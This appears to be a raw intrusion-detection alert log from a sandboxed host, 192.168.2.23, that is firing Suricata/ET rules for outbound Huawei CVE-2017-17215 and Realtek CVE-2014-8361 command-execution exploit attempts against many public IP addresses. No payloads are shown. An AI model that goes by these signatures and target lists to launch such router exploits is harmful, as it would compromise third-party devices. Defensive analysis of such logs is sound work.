                                      2024-07-20T23:01:20.287563+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4935252869192.168.2.23193.7.32.204
                                      2024-07-20T23:01:02.127340+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4707837215192.168.2.23197.24.224.193
                                      2024-07-20T23:01:18.416781+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4181837215192.168.2.23207.93.222.13
                                      2024-07-20T23:01:19.463189+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4325652869192.168.2.23206.208.92.27
                                      2024-07-20T23:01:00.660317+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4716437215192.168.2.23157.63.143.206
                                      2024-07-20T23:01:00.657714+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5850237215192.168.2.23197.160.34.184
                                      2024-07-20T23:01:02.083467+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3513637215192.168.2.23157.167.188.131
                                      2024-07-20T23:01:07.151635+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4220237215192.168.2.23197.43.231.118
                                      2024-07-20T23:01:09.027075+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4951652869192.168.2.23213.46.179.130
                                      2024-07-20T23:01:21.444565+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4943237215192.168.2.23157.146.94.28
                                      2024-07-20T23:01:08.912088+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3490652869192.168.2.23195.67.134.63
                                      2024-07-20T23:01:21.239495+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3448252869192.168.2.2380.176.127.107
                                      2024-07-20T23:01:04.444176+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5726252869192.168.2.23175.24.153.194
                                      2024-07-20T23:00:59.218458+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5370637215192.168.2.23157.34.104.183
                                      2024-07-20T23:01:20.301694+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4221652869192.168.2.2364.43.73.86
                                      2024-07-20T23:01:20.368453+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4925852869192.168.2.23190.34.49.149
                                      2024-07-20T23:01:20.249177+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5226452869192.168.2.2337.205.238.167
                                      2024-07-20T23:01:00.658630+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5721837215192.168.2.23197.71.69.91
                                      2024-07-20T23:01:09.107954+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5992452869192.168.2.23104.178.230.186
                                      2024-07-20T23:01:22.216856+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3509052869192.168.2.2399.2.133.89
                                      2024-07-20T23:01:00.658630+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3764237215192.168.2.23157.54.130.2
                                      2024-07-20T23:01:18.269553+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5313037215192.168.2.23157.110.226.143
                                      2024-07-20T23:01:00.652845+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5354037215192.168.2.23197.36.116.167
                                      2024-07-20T23:01:00.652845+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3595637215192.168.2.2341.48.165.8
                                      2024-07-20T23:01:19.428185+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4730252869192.168.2.23117.49.51.0
                                      2024-07-20T23:01:19.637159+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4872652869192.168.2.23142.90.33.83
                                      2024-07-20T23:00:59.181164+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5651237215192.168.2.23197.137.254.119
                                      2024-07-20T23:01:00.654988+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4507237215192.168.2.23157.230.177.125
                                      2024-07-20T23:01:21.198842+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5538437215192.168.2.23157.243.7.84
                                      2024-07-20T23:01:21.221137+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3700052869192.168.2.2377.76.243.3
                                      2024-07-20T23:01:18.424063+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4760437215192.168.2.23197.178.33.225
                                      2024-07-20T23:01:20.367117+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3479652869192.168.2.23171.201.20.41
                                      2024-07-20T23:01:02.079114+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3323037215192.168.2.2341.199.182.217
                                      2024-07-20T23:01:19.831896+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3401652869192.168.2.2325.68.235.59
                                      2024-07-20T23:01:13.014947+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5253652869192.168.2.23223.86.47.43
                                      2024-07-20T23:00:59.171003+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4848237215192.168.2.23197.160.117.109
                                      2024-07-20T23:00:59.218459+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3997637215192.168.2.2341.33.245.21
                                      2024-07-20T23:01:18.422394+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3945637215192.168.2.2357.35.73.126
                                      2024-07-20T23:01:21.967477+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4251237215192.168.2.23157.251.195.250
                                      2024-07-20T23:01:22.232607+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3340052869192.168.2.23111.160.194.136
                                      2024-07-20T23:01:08.957638+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4728852869192.168.2.2384.150.128.0
                                      2024-07-20T23:01:19.462356+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4804252869192.168.2.2354.250.134.170
                                      2024-07-20T23:01:02.088423+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4370837215192.168.2.23157.159.217.211
                                      2024-07-20T23:00:59.219743+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3342437215192.168.2.23157.77.208.129
                                      2024-07-20T23:01:21.812527+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5900652869192.168.2.23147.69.83.159
                                      2024-07-20T23:01:18.204287+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4886037215192.168.2.23157.115.56.95
                                      2024-07-20T23:01:00.660317+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4295637215192.168.2.2341.12.12.126
                                      2024-07-20T23:01:11.815719+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4237437215192.168.2.23106.4.213.108
                                      2024-07-20T23:01:08.903232+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5497652869192.168.2.23164.189.55.135
                                      2024-07-20T23:00:59.224296+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3344437215192.168.2.23197.168.86.78
                                      2024-07-20T23:01:00.654559+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4798237215192.168.2.23197.103.118.184
                                      2024-07-20T23:01:20.267455+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5982252869192.168.2.23193.135.58.157
                                      2024-07-20T23:01:02.065822+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4576437215192.168.2.23197.235.104.194
                                      2024-07-20T23:01:02.067656+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4774437215192.168.2.2341.16.105.104
                                      2024-07-20T23:01:19.858909+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3898252869192.168.2.23216.174.225.184
                                      2024-07-20T23:01:00.660317+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6091037215192.168.2.23197.118.146.83
                                      2024-07-20T23:01:21.822539+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4980852869192.168.2.23107.208.110.238
                                      2024-07-20T23:01:09.002255+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3811652869192.168.2.239.91.73.111
                                      2024-07-20T23:01:21.124881+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5905052869192.168.2.234.72.134.93
                                      2024-07-20T23:01:18.405549+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5330237215192.168.2.23157.143.196.120
                                      2024-07-20T23:01:23.420472+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3594852869192.168.2.2327.130.132.139
                                      2024-07-20T23:01:18.422394+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4445837215192.168.2.23157.170.128.9
                                      2024-07-20T23:01:19.876924+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5083452869192.168.2.23194.63.61.192
                                      2024-07-20T23:01:19.341430+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4934852869192.168.2.23131.199.217.59
                                      2024-07-20T23:01:21.567284+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3498852869192.168.2.23172.97.184.195
                                      2024-07-20T23:01:19.859313+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5599852869192.168.2.2344.70.248.184
                                      2024-07-20T23:01:21.272933+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5506652869192.168.2.23162.117.132.232
                                      2024-07-20T23:01:22.258326+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3398437215192.168.2.2341.137.58.228
                                      2024-07-20T23:01:21.271803+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3607252869192.168.2.232.10.234.63
                                      2024-07-20T23:01:22.249100+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4527652869192.168.2.23130.190.148.15
                                      2024-07-20T23:00:59.223718+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5607237215192.168.2.23169.239.10.111
                                      2024-07-20T23:01:18.493759+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5188037215192.168.2.23132.70.95.60
                                      2024-07-20T23:01:21.056479+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3345052869192.168.2.23104.55.221.40
                                      2024-07-20T23:00:59.223718+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3790637215192.168.2.2341.53.184.177
                                      2024-07-20T23:00:59.227759+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4269237215192.168.2.23197.241.179.191
                                      2024-07-20T23:01:18.247235+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5688637215192.168.2.2317.113.7.103
                                      2024-07-20T23:01:21.202997+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5186437215192.168.2.2341.229.84.234
                                      2024-07-20T23:01:20.235362+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4440452869192.168.2.234.131.130.12
                                      2024-07-20T23:01:21.152484+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5293652869192.168.2.2386.74.227.91
                                      2024-07-20T23:01:00.649623+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5802437215192.168.2.23163.95.87.60
                                      2024-07-20T23:01:19.901007+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5388252869192.168.2.23136.74.174.143
                                      2024-07-20T23:00:59.164966+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5002637215192.168.2.23197.213.172.133
                                      2024-07-20T23:01:02.135090+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3761652869192.168.2.23137.195.128.162
                                      2024-07-20T23:01:21.286674+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6024652869192.168.2.2340.55.203.85
                                      2024-07-20T23:01:25.181612+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4701437215192.168.2.23169.56.210.25
                                      2024-07-20T23:01:14.013456+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3442637215192.168.2.23197.175.44.160
                                      2024-07-20T23:01:21.827430+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5485452869192.168.2.23164.236.243.93
                                      2024-07-20T23:01:08.903232+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5170452869192.168.2.23131.199.217.59
                                      2024-07-20T23:01:02.127340+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4538437215192.168.2.2341.95.186.20
                                      2024-07-20T23:01:21.187021+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5272252869192.168.2.23139.37.94.236
                                      2024-07-20T23:00:59.201622+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5304437215192.168.2.23157.8.46.59
                                      2024-07-20T23:00:59.181164+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4382837215192.168.2.23195.225.222.112
                                      2024-07-20T23:01:21.099180+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5175252869192.168.2.239.70.14.160
                                      2024-07-20T23:01:06.518801+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4873437215192.168.2.2341.174.115.244
                                      2024-07-20T23:01:09.027075+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4480652869192.168.2.23157.202.7.129
                                      2024-07-20T23:01:19.924916+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5684052869192.168.2.2342.114.143.158
                                      2024-07-20T23:01:21.894210+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3961052869192.168.2.23119.8.134.128
                                      2024-07-20T23:01:00.658201+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5059637215192.168.2.2341.212.198.90
                                      2024-07-20T23:01:19.861361+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3545852869192.168.2.23126.16.187.60
                                      2024-07-20T23:00:59.224296+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4150237215192.168.2.23157.109.181.179
                                      2024-07-20T23:00:59.224296+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4478037215192.168.2.23219.159.165.91
                                      2024-07-20T23:01:00.657714+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3627037215192.168.2.2341.50.145.107
                                      2024-07-20T23:01:11.815702+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3899037215192.168.2.23157.62.189.35
                                      2024-07-20T23:01:19.845074+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4107852869192.168.2.23173.195.200.196
                                      2024-07-20T23:01:20.275632+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5263852869192.168.2.23123.42.160.177
                                      2024-07-20T23:00:59.203029+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4311837215192.168.2.23197.65.44.128
                                      2024-07-20T23:00:59.170219+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4325237215192.168.2.2372.152.128.124
                                      2024-07-20T23:01:00.649623+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4736837215192.168.2.23197.224.26.246
                                      2024-07-20T23:01:02.068476+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5745637215192.168.2.23197.90.236.107
                                      2024-07-20T23:01:23.911724+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4605852869192.168.2.23211.69.194.148
                                      2024-07-20T23:01:00.658298+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4409837215192.168.2.2341.239.125.129
                                      2024-07-20T23:00:59.180699+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5618637215192.168.2.23157.159.217.82
                                      2024-07-20T23:01:09.140149+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5925652869192.168.2.2342.114.143.158
                                      2024-07-20T23:01:18.294174+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4405237215192.168.2.23197.23.80.245
                                      2024-07-20T23:01:09.195568+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4610052869192.168.2.23209.154.77.145
                                      2024-07-20T23:01:22.231631+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4284252869192.168.2.23180.155.132.167
                                      2024-07-20T23:01:21.231934+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4306052869192.168.2.23223.83.213.222
                                      2024-07-20T23:01:21.973875+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5751252869192.168.2.23151.194.118.37
                                      2024-07-20T23:01:21.020720+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5356437215192.168.2.23157.72.248.222
                                      2024-07-20T23:01:21.279590+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3769652869192.168.2.23150.171.160.226
                                      2024-07-20T23:00:59.175742+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3563437215192.168.2.23197.19.12.241
                                      2024-07-20T23:01:18.295501+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4779437215192.168.2.2341.166.85.150
                                      2024-07-20T23:01:21.181035+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5855637215192.168.2.23197.75.123.93
                                      2024-07-20T23:01:00.658298+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3830437215192.168.2.23197.92.201.180
                                      2024-07-20T23:01:22.247638+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3900852869192.168.2.23159.70.111.204
                                      2024-07-20T23:01:00.652845+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5711037215192.168.2.2341.126.189.157
                                      2024-07-20T23:01:00.657714+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5933437215192.168.2.2397.43.136.85
                                      2024-07-20T23:01:02.067655+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5524637215192.168.2.2337.246.135.67
                                      2024-07-20T23:00:59.211994+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3639637215192.168.2.2381.147.177.5
                                      2024-07-20T23:01:18.296946+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5553037215192.168.2.23157.37.107.134
                                      2024-07-20T23:00:59.219743+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4665037215192.168.2.23110.243.142.209
                                      2024-07-20T23:00:59.227759+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4661837215192.168.2.23118.76.56.217
                                      2024-07-20T23:01:19.496217+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5697452869192.168.2.23153.15.211.214
                                      2024-07-20T23:01:21.011580+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4581052869192.168.2.23129.194.41.40
                                      2024-07-20T23:01:18.608485+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4944637215192.168.2.23199.229.94.109
                                      2024-07-20T23:01:20.191460+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5925052869192.168.2.23115.35.215.139
                                      2024-07-20T23:00:59.216912+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5698037215192.168.2.2341.75.227.101
                                      2024-07-20T23:01:00.661486+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4611637215192.168.2.23157.170.103.64
                                      2024-07-20T23:00:59.211994+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5693437215192.168.2.23157.223.197.130
                                      2024-07-20T23:00:59.224296+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4084237215192.168.2.2341.241.135.76
                                      2024-07-20T23:01:18.423367+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4368037215192.168.2.23157.254.68.190
                                      2024-07-20T23:01:19.826663+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5159052869192.168.2.2363.150.57.125
                                      2024-07-20T23:00:59.201622+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3465437215192.168.2.23197.241.127.58
                                      2024-07-20T23:01:18.278953+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4613637215192.168.2.23197.12.204.52
                                      2024-07-20T23:01:19.439299+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3439852869192.168.2.2327.254.228.216
                                      2024-07-20T23:01:21.014789+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5752252869192.168.2.23104.178.230.186
                                      2024-07-20T23:01:02.066021+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4817037215192.168.2.2343.99.159.58
                                      2024-07-20T23:00:59.218459+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4874237215192.168.2.23197.251.31.217
                                      2024-07-20T23:00:59.218458+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5552837215192.168.2.23210.132.156.163
                                      2024-07-20T23:01:18.159021+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3673437215192.168.2.23157.189.55.135
                                      2024-07-20T23:00:59.163619+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5361037215192.168.2.2341.178.183.186
                                      2024-07-20T23:00:59.176163+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3706037215192.168.2.23157.30.105.107
                                      2024-07-20T23:01:02.127340+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3628437215192.168.2.23104.38.28.110
                                      2024-07-20T23:01:21.171996+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5391852869192.168.2.23148.211.13.100
                                      2024-07-20T23:01:18.544436+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4080237215192.168.2.2341.157.99.54
                                      2024-07-20T23:01:21.226483+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5956237215192.168.2.23197.67.79.4
                                      2024-07-20T23:01:21.277827+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3662637215192.168.2.23217.159.91.139
                                      2024-07-20T23:01:02.119631+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4169237215192.168.2.23155.230.89.206
                                      2024-07-20T23:01:04.993704+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4407652869192.168.2.2327.181.35.71
                                      2024-07-20T23:01:20.370706+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4571652869192.168.2.23130.136.141.197
                                      2024-07-20T23:01:19.529461+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3614252869192.168.2.23160.189.204.148
                                      2024-07-20T23:01:00.661808+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5699637215192.168.2.2341.39.168.222
                                      2024-07-20T23:01:19.479146+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4014452869192.168.2.2347.237.197.200
                                      2024-07-20T23:01:19.482947+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5497652869192.168.2.23151.5.114.8
                                      2024-07-20T23:01:21.603420+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5227652869192.168.2.2391.233.41.28
                                      2024-07-20T23:01:19.921226+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3351852869192.168.2.2327.130.132.139
